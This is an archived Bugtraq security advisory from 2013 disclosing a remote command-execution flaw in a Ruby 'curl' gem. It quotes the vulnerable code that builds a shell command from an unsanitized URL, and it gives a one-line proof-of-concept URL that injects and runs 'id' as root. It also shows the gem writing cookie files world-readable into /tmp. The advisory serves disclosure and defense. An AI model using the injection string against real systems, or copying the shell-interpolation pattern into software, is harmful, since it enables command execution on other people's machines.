Home page logo
/

bugtraq logo Bugtraq mailing list archives

Curl Ruby Gem Remote command execution
From: Larry0 () me com
Date: Fri, 15 Mar 2013 14:09:28 GMT

Curl Ruby Gem Remote command execution
3/12/2013
https://github.com/tg0/curl

Specially crafted URLs can result in remote code execution:

In ./lib/curl.rb the following lines:

131       cmd = "curl #{cookies_store} #{browser_type} #{ () setup_params} {ref}  \"{url}\"  "
132         if @debug
133                 puts cmd.red
134         end
135         result = open_pipe(cmd)
PoC
page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"";)

larry () underfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)

Larry W. Cashdollar
@_larry0
http://vapid.dhs.org

This gem also stores cookie data insecurely in /tmp:
root () underfl0w:/tmp# ls -ld curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 curl
root () underfl0w:/tmp# ls -ld /tmp/curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 /tmp/curl
root () underfl0w:/tmp# ls -la curl/curl_0.*
-rw-r--r-- 1 root root 428 Mar 12 18:44 curl/curl_0.287351232063069_0.217269869500322.jar
-rw-r--r-- 1 root root 428 Mar 12 18:25 curl/curl_0.564885403765839_0.0415036222928075.jar
root () underfl0w:/tmp# cat /tmp/curl/curl_0.*
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

.google.com     TRUE    /       FALSE   1426199640      PREF    
ID=c637a1a53176d2bd:FF=0:TM=1363127640:LM=1363127640:S=XG_kBQswSvKUKY5m
#HttpOnly_.google.com   TRUE    /       FALSE   1378938840      NID     
67=kOUx2FhV6OQ6MSybmqD5vZMSI3gH8jB22AC4ReeIoqZHbao8zkejJncER8YznFgSVes6_MfqBJpgyPdR1snw3POtLL1Nr96RsQqHcdv6v6rkSmj_Z2XmVakZ95Rt1wMC
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

.google.com     TRUE    /       FALSE   1426198990      PREF    
ID=ca381d47b3f5aec2:FF=0:TM=1363126990:LM=1363126990:S=HrBfHkxDYMih4kfC
#HttpOnly_.google.com   TRUE    /       FALSE   1378938190      NID     
67=ozR4v4tBjG9kUmFshdYLu7h0Z_fyXBpTrABHtlJYbEpkB1czXMKEGa_S5t3rMBbunYIeEaguy3l1fOkfWqFni_ajjxipoyNK4taRefp977i7yV_xc4GIEtP-OQuRCydF
root () underfl0w:/tmp# 


  By Date           By Thread  

Current thread:
  • Curl Ruby Gem Remote command execution Larry0 (Mar 15)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault